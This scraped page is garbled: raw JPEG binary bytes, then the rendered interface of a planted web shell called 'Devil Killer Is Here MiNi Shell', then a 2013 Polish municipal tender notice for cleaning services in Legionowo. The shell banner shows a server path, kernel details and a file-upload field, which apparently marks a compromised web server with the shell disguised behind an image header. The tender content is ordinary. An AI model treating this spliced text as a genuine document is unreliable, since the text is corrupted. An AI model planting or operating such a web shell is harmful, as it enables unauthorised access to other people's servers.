JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131219/277249-N-2013.html

<p class="kh_header"><b>Legionowo: Świad. kompleks.usł. sprząt.w zakr.: Zad. I - Świad. kompleks. usł. sprząt. hali Arena L-wo przy ul. Chrobrego 50B w L-wie, Zadanie II - Świad. usł. mycia wew. i zew. okien i pow. szklanych na potrzeby U. Miasta Legionowo w bud. Centrum Infor.-Admin. przy ul. Piłsudskiego 41 w L-wie oraz w hali Arena L-wo przy ul. Chrobrego 50B w L-wie, Zad. III - Świad. kompleks. usł. maszynowego czyszczenia posadzki garażu podziemnego w budynku Centrum Informac.-Admin. w L-wie, Zadanie IV - Świad. usł. czyszczenia wykładzin na potrzeby U. Miasta L-wo w bud. Centrum Inf.-Adm. i hali Arena L-wo</b><br>
<b>Numer ogłoszenia: 277249 - 2013; data zamieszczenia: 19.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Legionowo Urząd Miasta Legionowo , ul.  marsz. J. Piłsudskiego 41, 05-120 Legionowo, woj. mazowieckie, tel. 022 774 20 31 w. 4064, faks 022 784 49 81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.legionowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świad. kompleks.usł. sprząt.w zakr.: Zad. I - Świad. kompleks. usł. sprząt. hali Arena L-wo przy ul. Chrobrego 50B w L-wie, Zadanie II - Świad. usł. mycia wew. i zew. okien i pow. szklanych na potrzeby U. Miasta Legionowo w bud. Centrum Infor.-Admin. przy ul. Piłsudskiego 41 w L-wie oraz w hali Arena L-wo przy ul. Chrobrego 50B w L-wie, Zad. III - Świad. kompleks. usł. maszynowego czyszczenia posadzki garażu podziemnego w budynku Centrum Informac.-Admin. w L-wie, Zadanie IV - Świad. usł. czyszczenia wykładzin na potrzeby U. Miasta L-wo w bud. Centrum Inf.-Adm. i hali Arena L-wo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie I - Świadczenie kompleksowej usługi sprzątania hali Arena Legionowo przy ul.B.Chrobrego 50B w Legionowie.
1. Przedmiotem zamówienia jest kompleksowa usługa sprzątania i utrzymania w ciągłej czystości obiektu hali widowiskowo-sportowej Arena Legionowo przy ul. B. Chrobrego 50B w Legionowie. Usługa będzie realizowana przez:
1) Serwis dzienny (jedna osoba):
a) w okresie od dnia podpisania umowy do 31.05.2014 r. oraz od 1.08.2014 r. do 31.12.2014 r. codziennie od poniedziałku do niedzieli (oprócz dni ustawowo wolnych od pracy ) w godzinach 12:00 - 20:00. Sprzątanie pomieszczeń biurowych i sali konferencyjnej z zapleczem odbywać się będzie od poniedziałku do piątku (oprócz dni ustawowo wolnych od pracy) w god. 18:00-20:00;
b) w okresie od 1.06 do 31.07 codziennie od poniedziałku do niedzieli (oprócz dni ustawowo wolnych od pracy) w godzinach od 14:00 - 20:00. Sprzątanie pomieszczeń biurowych odbywać się będzie od poniedziałku do piątku (oprócz dni ustawowo wolnych od pracy) w godzinach 18:00-20:00. Sprzątanie sali konferencyjnej z zapleczem 1 raz w tygodniu w terminie ustalonym 
z Zamawiającym.
2) Serwis nocny:
a) w okresie od dnia podpisania umowy do 31.05.2014 r. oraz od 1.08.2014r. do 31.12.2014 r. codziennie od poniedziałku do niedzieli (oprócz dni ustawowo wolnych od pracy ) w godz. 24:00 do 6:00;
b) w okresie od 1.06.2014 r. do 31.07.2014 r. 3 razy w tygodniu w terminie ustalonym 
z Zamawiającym w godzinach od 24:00 do 6:00.
2. Szczegółowy zakres świadczenia usługi został opisany w załączniku nr 1.
1) mycie trybun - jeden raz w tygodniu, w terminie ustalonym z Zamawiającym;
2) sprzątanie hali odbywać się będzie przy oświetleniu - scena 2;
3) Koszty zużycia energii elektrycznej, zużycia wody, odprowadzenia ścieków i wywóz nieczystości komunalnych ponosi Zamawiający, za wyjątkiem ust. 13.
3. Zestawienie pow. będącej przedmiotem świadczenia usługi określono w tabeli nr 2 z zał. nr 1.
4. Sprzątanie w trakcie dużych imprez - Zamawiający przewiduje 40 dni imprezowych rocznie.
1) na potrzeby dużych imprez Zamawiający zgłosi zapotrzebowanie na drugą osobę do serwisu dziennego drogą elektroniczną i telefoniczną nie później niż na 5 dni przed imprezą. Zadaniem serwisu jest utrzymywanie w ciągłej czystości holów, klatek schodowych, toalet ogólnodostępnych oraz bieżące uzupełnienie środków higieny i opróżnianie pojemników na śmieci. Podczas imprez pracownicy Wykonawcy zobowiązani są do utrzymania ciągłego kontaktu z kierownikiem hali;
2) w czasie imprez personel zobowiązany będzie do monitorowania i sprawdzania obszarów sprzątania z częstotliwością co 30 minut. Potwierdzenie stanu czystości danego obszaru będzie odnotowane na tabliczkach raportowych, umieszczonych w dwóch ogólnodostępnych toaletach na parterze, dwóch ogólnodostępnych toaletach na pierwszym piętrze, w holu głównym hali widowiskowo-sportowej Arena, wpisując godzinę kontroli czystości oraz składając własnoręczny podpis zaświadczający o właściwym i należytym stanie czystości.
5. Wykonawca zapewnia i ponosi koszty wszystkich środków czystości, urządzeń niezbędnych do wykonania przedmiotu zamówienia oraz środków stosowanych w podajnikach wymienianych (papier toaletowy - kolor biały, dostosowany do podajników, worki na śmieci, papier do rąk). Zamawiający zastrzega sobie prawo na etapie oceny oraz realizacji umowy, zażądania od Wykonawcy próbek (egzemplarza) zaoferowanego środka do dozowników i pojemników oraz stosowanych środków czyszcząco - dezynfekujących, w celu wyjaśnienia ewentualnych wątpliwości, co do ich zgodności z wymaganiami zamawiającego. Wykonawca dostarczy próbki wszystkich środków czyszczących, a szczególnie środków do usuwania kleju i mycia podłogi drewnianej, które będą przechowywane u Zamawiającego. Każda zmiana środka musi być potwierdzona pisemnie przez Zamawiającego.
6. Zamawiający udostępni pomieszczenia Nr 3 i 8 o łącznej powierzchni 22,30 m2, a Wykonawca zobowiązuje się do prawidłowego eksploatowania pomieszczenia wyłącznie na potrzeby realizacji świadczonej usługi. Wykonawca zobowiązuje się do utrzymania porządku i przekazania Zamawiającemu pomieszczenia w dniu rozwiązania lub wygaśnięcia umowy w stanie niepogorszonym z wyjątkiem zużycia będącego następstwem prawidłowego używania.
7. Hala posiada nawierzchnię sportową drewnianą, nawierzchnię rozkładaną sportową teraflex 
z tworzywa sztucznego oraz wykładzinę ochronną na nawierzchnię sportową, do których należy stosować odpowiednie środki czystości. Sprzątanie teraflexu sportowego i ochronnego oraz podłogi drewnianej powinno odbywać się zgodnie z instrukcją czyszczenia dla tej nawierzchni. Informacji 
o środkach zalecanych przez producenta oraz instrukcją czyszczenia nawierzchni sportowych do każdego rodzaju nawierzchni została określona w załączniku nr 17 do SIWZ . Wykonawca jest zobowiązany do zastosowania środków przeznaczonych do przedmiotowych powierzchni lub ich równoważników (tzn. środków przeznaczonych do tego typu nawierzchni).  Wszędzie, gdzie użyto znaków towarowych, patentów lub pochodzenia, wykonawca przyjmie, że wskazaniu takiemu towarzyszą wyrazy lub równoważny i wykonawca może zaoferować przedmiot równoważny, tj. Środek przeznaczony do tego typu nawierzchni.
8. Wykonawca zapewni do wykonania przedmiotu zamówienia środki czystości i preparaty ochronne przeznaczone do czyszczenia i konserwacji wszystkich powierzchni Zamawiającego. Wykonawca ponosi pełną odpowiedzialność za zniszczenia mienia Zamawiającego w wyniku zastosowania nieodpowiedniego środka czyszczącego.
9. Wykonawca oświadcza, że użyte środki i materiały posiadają atesty PZH lub charakterystyki zgodnie z obowiązującymi przepisami (do okazania na żądanie Zamawiającego), są dobrej jakości i nie są szkodliwe dla środowiska jak i przedmiotu zamówienia podlegającemu czyszczeniu. Środki te muszą zostać dopuszczone do obrotu, muszą być odpowiednie do rodzaju czyszczonej powierzchni oraz muszą być stosowane przed upływem terminu przydatności do użycia. Zamawiający zastrzega sobie prawo do kontroli i weryfikacji stosowanych środków.
10. Wykonawca będzie wykonywał czynności sprzątania, czyszczenia i mycia okładzin ściennych 
i podłogowych, powierzchni szklanych i kamiennych oraz sprzętu i wyposażenia biurowego objętych gwarancją producenta/wykonawcy zgodnie z instrukcjami konserwacji w sposób, który nie spowoduje utraty gwarancji.
11. Zamawiający zastrzega sobie prawo wystąpienia, w uzasadnionych przypadkach, o zmianę rodzaju używanych środków.
12. Zaleca się, aby Wykonawca dokonał wizji lokalnej w obiektach hali widowiskowo-sportowej Arena Legionowo, w celu sprawdzenia warunków związanych z wykonaniem prac będących przedmiotem zamówienia, oraz uzyskania dodatkowych informacji przydatnych do prawidłowej wyceny przedmiotu zamówienia. Wyklucza się bowiem możliwość składania roszczeń z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy. Koszty dokonania wizji lokalnej ponosi wykonawca.
13. Wykonawca jest zobowiązany we własnym zakresie i na własny koszt odbierać opakowania po środkach czyszczących i konserwujących używanych przy realizacji przedmiotu zamówienia.
14. Wykonawca zobowiązany jest do wyposażenia pracowników w czyste firmowe ubrania 
z identyfikatorami umieszczonymi w widocznym miejscu.
15. Wykonawca jest zobowiązany do niezwłocznego zgłaszania wszelkich uwag o usterkach wymagających napraw np. przepalone żarówki, wyrwane kontakty, zepsute zamki w drzwiach, niedrożne umywalki, pisuary i sedesy, poprzez wpis do rejestru, który będzie znajdował się 
w pomieszczeniu monitoringu.
16. Usługa świadczona będzie zgodnie z przepisami BHP i wykonywać ją będą osoby przeszkolone w tym zakresie.
17. Wykonawca ponosi pełną odpowiedzialność za kradzież, uszkodzenie lub zniszczenie rzeczy należących do Zamawiającego w trakcie wykonywania usługi.
18. Wykonawca wyznaczy osobę do utrzymania stałego kontaktu z Zamawiającym.
19. Cena ofertowa zawierać będzie wszystkie koszty związane z realizacją usługi jakie poniesie Zamawiający.
20. Rozliczenie świadczonej usługi następować będzie ryczałtowo na koniec każdego miesiąca.
21. Zamawiający ureguluje należność za wykonaną usługę zgodnie z fakturą Wykonawcy, przelewem na podany w jej treści rachunek bankowy w terminie 30 dni od daty otrzymania prawidłowo wystawionej faktury VAT.
22. Zamawiający zastrzega sobie prawo do okresowego kontrolowania należytego wykonania usługi przez Wykonawcę. Z czynności kontrolnych będzie sporządzony protokół a ewentualne uchybienia muszą zostać usuwane na bieżąco.
23. Wykonawca zobowiązuje się do przestrzegania regulaminu użytkowania Hali Widowiskowo-Sportowej ARENA LEGIONOWO przy ul. B.Chrobrego 50B w Legionowie.
Zadanie II - Świadczenie usługi mycia wewnętrznego i zewnętrznego okien i powierzchni szklanych na potrzeby Urzędu Miasta Legionowo w budynku Centrum Informacyjno-Administracyjnego przy ul. marsz. J. Piłsudskiego 41 w Legionowie oraz w hali Arena Legionowo przy ul. B. Chrobrego 50B w Legionowie.
1. Przedmiotem zamówienia jest świadczenie usług mycia wewnętrznego i zewnętrznego okien 
i powierzchni szklanych na potrzeby Urzędu Miasta Legionowo w budynku Centrum Informacyjno-Administracyjnego przy ul. marsz. J. Piłsudskiego 41 w Legionowie oraz w hali Arena Legionowo przy ul. B. Chrobrego 50B w Legionowie.
Zamawiający przewiduje jednokrotne wykonanie usługi w terminie marzec/kwiecień 2014 r.
2. Koszty zużycia energii elek., zużycia wody i odprowadzenia ścieków ponosi Zamawiający.
3. Szczegółowy termin realizacji przedmiotu zamówienia zostanie ustalony z 2 tygodniowym wyprzedzeniem.
4. Usługa może być świadczona od piątku od godziny 16:00 do niedzieli. Wykonawca zrealizuje usługę jednorazowo dla każdego obiektu w terminie do 14 dni od daty zlecenia.
Zadanie III - Świadczenie kompleksowej usługi maszynowego czyszczenia posadzki garażu podziemnego w budynku Centrum Informacyjno-Administracyjnego przy ul. marsz. 
J. Piłsudskiego 41 w Legionowie.
1. Przedmiotem zamówienia jest świadczenie kompleksowej usługi maszynowego czyszczenia posadzki garażu obejmującej zamiatanie, maszynowe czyszczenie oraz czyszczenie kratek odpływowych w garażu podziemnym w budynku Centrum Informacyjno-Administracyjnego przy ul. marsz. J. Piłsudskiego 41 w Legionowie.
2. Szacunkowa powierzchnia garażu podziemnego w budynku Centrum Informacyjno-Administracyjnego wynosi 1.700 m2
3. Garaż podziemny posiada nawierzchnie z masy żywic poliuretanowych ISPO.
4. Podana powierzchnia ma charakter szacunkowy, służy w celu porównania ofert pod względem cenowym i nie stanowi wynagrodzenia Wykonawcy.
5. Zamawiający w okresie trwania umowy przewiduje 2 krotne mycie garażu w budynku Centrum Informacyjno- Administracyjnego.
6. Koszty zużycia energii elektrycznej, zużycia wody i odprowadzenia ścieków ponosi Zamawiający.
7. Planowane terminy wykonania usługi:
1)  I termin marzec/kwiecień 2014r.;
2)  II termin wrzesień/październik 2014 r.
8. Szczegółowy termin realizacji przedmiotu zamówienia zostanie ustalony z 2 tygodniowym wyprzedzeniem.
9. Usługa może być świadczona w dniach od piątku (od godziny 18:30) do niedzieli (do godziny 24:00).
Zadanie IV - Świadczenie usługi czyszczenia wykładzin na potrzeby Urzędu Miasta Legionowo w budynku Centrum Informacyjno-Administracyjnego przy ul. marsz. 
J. Piłsudskiego 41 w Legionowie oraz w hali Arena Legionowo przy ul. B. Chrobrego 50B 
w Legionowie.
1. Przedmiotem zamówienia jest świadczenia usługi czyszczenia wykładzin dywanowych w pomieszczeniach biurowych i na korytarzach w budynku Centrum Informacyjno-Administracyjnego oraz w hali widowiskowo-sportowej Arena Legionowo przy ul. B. Chrobrego 50B w Legionowie.
2. Szacunkowa powierzchnia czyszczenia wykładzin wynosi: 2.000 m2. 
3 Podana powierzchnia ma charakter szacunkowy, służy w celu porównania ofert pod względem cenowym i nie stanowi wynagrodzenia Wykonawcy.
4. Świadczenie usługi będzie wynikało z bieżącego zapotrzebowania Zamawiającego. Usługa będzie świadczona sukcesywnie na podstawie pisemnego zapotrzebowania Zamawiającego.
5. Koszty zużycia energii elektrycznej, zużycia wody i odprowadzenia ścieków ponosi Zamawiający.
6. Usługa może być świadczona w dniach od piątku (od godziny 16:00) do niedzieli (do godziny 22:00).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 90.91.40.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> dla zadania I:zamawiający wymaga wpłaty wadium w kwocie:3.000,00 zł (słownie: trzy tysiące złotych)
Dla zadania II, III i IV zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla zadania I:
1) wykonania w okresie ostatnich 3 lat co najmniej jednej usługi w zakresie utrzymania czystości wewnątrz budynku obiektu sportowego o powierzchni użytkowej nie mniejszej niż 2.000 m2 będącej w miesięcznym utrzymaniu, zrealizowanej w ramach jednej umowy w sposób ciągły przez okres min. 6 miesięcy i miesięcznej wartości brutto min. 12.500 zł;
dla zadania II:
2) wykonania w okresie ostatnich 3 lat co najmniej dwóch usług polegających na myciu okien 
i powierzchni szklanych na wysokościach min. 15 m i wartości brutto min. 9.000 zł  każda;
dla zadania III:
3) wykonania w okresie ostatnich 3 lat co najmniej dwóch usług polegających na maszynowym czyszczeniu powierzchni z żywic poliuretanowych min 1.200 m2  każda;
dla zadania IV:
4) wykonania w okresie ostatnich 3 lat co najmniej dwóch usług polegających na czyszczeniu wykładzin dywanowych o wartości brutto min. 5.000 zł każda;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla zadania I:
1) posiadania opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia w wysokości nie mniejszej niż 200.000,00 zł lub równowartości tej kwoty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.legionowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dokumentację przetargową można otrzymać w Urzędzie Miasta Legionowo, ul. marsz. J. Piłsudskiego 41, II piętro, pok. 3.12 lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.01.2014 godzina 11:30, miejsce: Siedziba zamawiającego: Biuro Obsługi Klienta, Urząd Miasta Legionowo, ul. marsz. J. Piłsudskiego 41, 05-120 Legionowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 01.02.2014.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I - Świadczenie kompleksowej usługi sprzątania hali Arena Legionowo przy ul.B.Chrobrego 50B w Legionowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa usługa sprzątania i utrzymania w ciągłej czystości obiektu hali widowiskowo-sportowej Arena Legionowo przy ul. B. Chrobrego 50B w Legionowie. Usługa będzie realizowana przez:
1) Serwis dzienny (jedna osoba):
a) w okresie od dnia podpisania umowy do 31.05.2014 r. oraz od 1.08.2014 r. do 31.12.2014 r. codziennie od poniedziałku do niedzieli (oprócz dni ustawowo wolnych od pracy ) w godzinach 12:00 - 20:00. Sprzątanie pomieszczeń biurowych i sali konferencyjnej z zapleczem odbywać się będzie od poniedziałku do piątku (oprócz dni ustawowo wolnych od pracy) w god. 18:00-20:00;
b) w okresie od 1.06 do 31.07 codziennie od poniedziałku do niedzieli (oprócz dni ustawowo wolnych od pracy) w godzinach od 14:00 - 20:00. Sprzątanie pomieszczeń biurowych odbywać się będzie od poniedziałku do piątku (oprócz dni ustawowo wolnych od pracy) w godzinach 18:00-20:00. Sprzątanie sali konferencyjnej z zapleczem 1 raz w tygodniu w terminie ustalonym 
z Zamawiającym.
2) Serwis nocny:
a) w okresie od dnia podpisania umowy do 31.05.2014 r. oraz od 1.08.2014r. do 31.12.2014 r. codziennie od poniedziałku do niedzieli (oprócz dni ustawowo wolnych od pracy ) w godz. 24:00 do 6:00;
b) w okresie od 1.06.2014 r. do 31.07.2014 r. 3 razy w tygodniu w terminie ustalonym 
z Zamawiającym w godzinach od 24:00 do 6:00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8.</p></li>
